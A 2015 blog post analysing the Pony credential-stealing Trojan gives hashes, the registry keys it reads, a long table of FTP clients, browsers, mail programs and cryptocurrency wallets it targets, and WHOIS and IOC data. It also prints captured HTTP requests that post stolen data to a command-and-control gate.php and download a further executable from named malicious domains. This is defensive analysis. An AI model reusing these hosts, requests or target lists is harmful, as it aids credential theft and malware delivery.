Malware analysis

Reversing the Pony Trojan Part I

November 23, 2015 by SecRat

Pony is a stealer Trojan and has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins ( https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/) . In this post we will try to cover the reversing of pony Trojan.

Tools required

  1. VMware
  2. IDA Disassembler
  3. OllyDbg Debugger
  4. Hex editor

First, we will examine its dynamic analysis behavior.

FILE NAME tt2.exe
FILE SIZE 209408 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 6245899b11a6bd6769b3656943322d13
SHA1 9879565d8c82e356cb7da62b9f04c3707cd3aac8
SHA256 15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1
SHA512 1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080
CRC32 906EA658
SSDEEP 3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D
YARA None matched

Running it though Cuckoo we get the following basic details about it:

We now have an initial idea what the malware is doing. It can be summarized as:

  1. Connects to traffic.
  2. Has an anti-sandbox feature (based on time difference)
  3. Hooks and Reads browser data.
  4. Hides itself in ADS.

Look at some of its some of its registry modification or retrievals.

HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 6 HomeQCToolbar

HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 6 ProfessionalQCToolbar

HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 7 HomeQCToolbar

HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 7 ProfessionalQCToolbar

HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 8 HomeQCToolbar

HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 8 ProfessionalQCToolbar

HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 9QCToolbar

HKEY_CURRENT_USERSoftwareFlashFXP3

HKEY_CURRENT_USERSoftwareFlashFXP

HKEY_CURRENT_USERSoftwareFlashFXP4

HKEY_LOCAL_MACHINESoftwareFlashFXP3

HKEY_LOCAL_MACHINESoftwareFlashFXP

HKEY_LOCAL_MACHINESoftwareFlashFXP4

HKEY_CURRENT_USERSoftwareFileZilla

HKEY_CURRENT_USERSoftwareFileZilla Client

HKEY_LOCAL_MACHINESoftwareFileZilla

HKEY_LOCAL_MACHINESoftwareFileZilla Client

HKEY_CURRENT_USERSoftwareBPFTPBullet Proof FTPMain

HKEY_CURRENT_USERSoftwareBulletProof SoftwareBulletProof FTP ClientMain

HKEY_CURRENT_USERSoftwareBPFTPBullet Proof FTPOptions

HKEY_CURRENT_USERSoftwareBulletProof SoftwareBulletProof FTP ClientOptions

HKEY_CURRENT_USERSoftwareBPFTP

HKEY_CURRENT_USERSoftwareTurboFTP

HKEY_LOCAL_MACHINESoftwareTurboFTP

HKEY_CURRENT_USERSoftwareSotaFFFTP

HKEY_CURRENT_USERSoftwareSotaFFFTPOptions

HKEY_CURRENT_USERSoftwareCoffeeCup SoftwareInternetProfiles

HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSites

HKEY_CURRENT_USERSoftwareFTP ExplorerFTP ExplorerWorkspaceMFCToolBar-224

HKEY_CURRENT_USERSoftwareFTP ExplorerProfiles

HKEY_CURRENT_USERSoftwareVanDykeSecureFX

HKEY_CURRENT_USERSoftwareCryerWebSitePublisher

HKEY_CURRENT_USERSoftwareExpanDriveSessions

HKEY_CURRENT_USERSoftwareExpanDrive

HKEY_LOCAL_MACHINESoftwareNCH SoftwareClassicFTPFTPAccounts

HKEY_CURRENT_USERSoftwareNCH SoftwareClassicFTPFTPAccounts

HKEY_CURRENT_USERSOFTWARENCH SoftwareFlingAccounts

HKEY_LOCAL_MACHINESOFTWARENCH SoftwareFlingAccounts

HKEY_CURRENT_USERSoftwareFTPClientSites

HKEY_LOCAL_MACHINESoftwareFTPClientSites

HKEY_CURRENT_USERSoftwareSoftX.orgFTPClientSites

HKEY_LOCAL_MACHINESoftwareSoftX.orgFTPClientSites

HKEY_CURRENT_USERSOFTWARELeapWare

HKEY_LOCAL_MACHINESOFTWARELeapWare

HKEY_CURRENT_USERSoftwareMartin Prikryl

HKEY_LOCAL_MACHINESoftwareMartin Prikryl

HKEY_CURRENT_USERSoftwareSouth River TechnologiesWebDriveConnections

HKEY_LOCAL_MACHINESoftwareSouth River TechnologiesWebDriveConnections

As you can see, it is evident that it is trying to look for stored password related information. Apart from stored credentials, it also steals bitcoin. Following is the list software it tries to steal from:

AR Manager FTPGetter Pocomail
Total Commander ALFTP IncrediMail
WS_FTP Internet Explorer The Bat!
CuteFTP Dreamweaver Outlook
FlashFXP DeluxeFTP Thunderbird
FileZilla Google Chrome FastTrackFTP
FTP Commander Chromium / SRWare Iron Bitcoin
BulletProof FTP ChromePlus Electrum
SmartFTP Bromium (Yandex Chrome) MultiBit
TurboFTP Nichrome FTP Disk
FFFTP Comodo Dragon Litecoin
CoffeeCup FTP / Sitemapper RockMelt Namecoin
CoreFTP K-Meleon Terracoin
FTP Explorer Epic Bitcoin Armory
Frigate3 FTP Staff-FTP PPCoin (Peercoin)
SecureFX AceFTP Primecoin
UltraFXP Global Downloader Feathercoin
FTPRush FreshFTP NovaCoin
WebSitePublisher BlazeFTP Freicoin
BitKinex NETFile Devcoin
ExpanDrive GoFTP Frankocoin
ClassicFTP 3D-FTP ProtoShares
Fling Easy FTP MegaCoin
SoftX Xftp Quarkcoin
Directory Opus FTP Now Worldcoin
FreeFTP / DirectFTP Robo-FTP Infinitecoin
LeapFTP LinasFTP Ixcoin
WinSCP Cyberduck Anoncoin
32bit FTP Putty BBQcoin
NetDrive Notepad + + Digitalcoin
WebDrive CoffeeCup Visual Site Designer Mincoin
FTP Control FTPShell Goldcoin
Opera FTPInfo Yacoin
WiseFTP NexusFile Zetacoin
FTP Voyager FastStone Browser Fastcoin
Firefox CoolNovo I0coin
FireFTP WinZip Tagcoin
SeaMonkey Yandex.Internet / Ya.Browser Bytecoin
Flock MyFTP Florincoin
Mozilla sherrod FTP Phoenixcoin
LeechFTP NovaFTP Luckycoin
Odin Secure FTP Expert Windows Mail Craftcoin
WinFTP Windows Live Mail Junkcoin
FTP Surfer Becky!

It copies itself into the system by using an integer filename, which is executed though a chain of ShellExecuteEx

FILE NAME 31780534.exe
FILE SIZE 317440 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 2bd7a3cc81ae70b16b2a85008fb7dd81
SHA1 7bf35f051a44dc31f0b138e1874e1d75745d49b3
SHA256 57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856
CRC32 4AA8F5BD
SSDEEP 6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M
YARA None matched

Not only does pony steal information, but it also downloads other malware, which are hardcoded in the binary itself

http://titratresfi.ru/gate.php POST /gate.php HTTP/1.0
Host: titratresfi.ru
Accept: */*
Accept-Encoding: identity, *;q=0

Accept-Language: en-US

Content-Length: 270

Content-Type: application/octet-stream

Connection: close

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http://adishma.com/media/system/shost.exe GET /media/system/shost.exe HTTP/1.0

Host: adishma.com

Accept-Language: en-US

Accept: */*

Accept-Encoding: identity, *;q=0

Connection: close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Now let’s look at the network traffic it has generated.

It sends basic information to the command and control server, which we are going to examine deeply in the second post.

Network information

domain: TITRATRESFI.RU

nserver: ns1.entrydns.net.

nserver: ns2.entrydns.net.

state: REGISTERED, DELEGATED, VERIFIED

person: Private Person

registrar: R01-RU

admin-contact: https://partner.r01.ru/contact_admin.khtml

created: 2015.11.09

paid-till: 2016.11.09

free-date: 2016.12.10

source: TCI

Last updated on 2015.11.15 16:16:33 MSK

Domain Name: ADISHMA.COM

Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM

Sponsoring Registrar IANA ID: 303

Whois Server: whois.PublicDomainRegistry.com

Referral URL: http://www.PublicDomainRegistry.com

Name Server: NS1.SOFTONETECHNOLOGIES.COM

Name Server: NS2.SOFTONETECHNOLOGIES.COM

Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited

Updated Date: 07-sep-2015

Creation Date: 26-dec-2014

Expiration Date: 26-dec-2015

IOC

<Indicator id=”aae1b2d0-a5ad-471a-8c48-2296f6cfb49e” operator=”OR”>

<IndicatorItem condition=”is” id=”b1984833-80fe-446b-a3d8-3349822f6336″>

<Context document=”FileItem” search=”FileItem/Md5sum” type=”mir”/>

<Content type=”md5″>6245899b11a6bd6769b3656943322d13</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”e2168e97-5db8-4432-b498-8a5973deeb42″>

<Context document=”FileItem” search=”FileItem/Sha1sum” type=”mir”/>

<Content type=”sha1″>9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”f66fb3f0-1178-4638-bf06-24d131cfd2c7″>

<Context document=”FileItem” search=”FileItem/Sha256sum” type=”mir”/>

<Content type=”sha256″>15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>

</IndicatorItem>

<Indicator id=”81c75ab7-69b2-434d-808f-607a5b283cec” operator=”AND”>

<IndicatorItem condition=”is” id=”bb45ed4b-823c-41d0-8831-0ab41c874a7f”>

<Context document=”FileItem” search=”FileItem/FileName” type=”mir”/>

<Content type=”string”>Centrylink</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”9194b695-6af4-428f-b2cf-3a40c2560e78″>

<Context document=”FileItem” search=”FileItem/SizeInBytes” type=”mir”/>

<Content type=”int”>209408</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”010608b2-0016-426d-9dce-2e9ad855f786″>

<Context document=”FileItem” search=”FileItem/PEInfo/PETimeStamp” type=”mir”/>

<Content type=”date”>2015-11-12T09:49:00Z</Content>

</IndicatorItem>

</Indicator>

Using VT we are able to map other files which are using the same location for downloading other malware.

Posted: November 23, 2015
Author
SecRat
View Profile

SecRat works at a start-up. He's interested in Windows Driver Programming.

Leave a Reply

Your email address will not be published.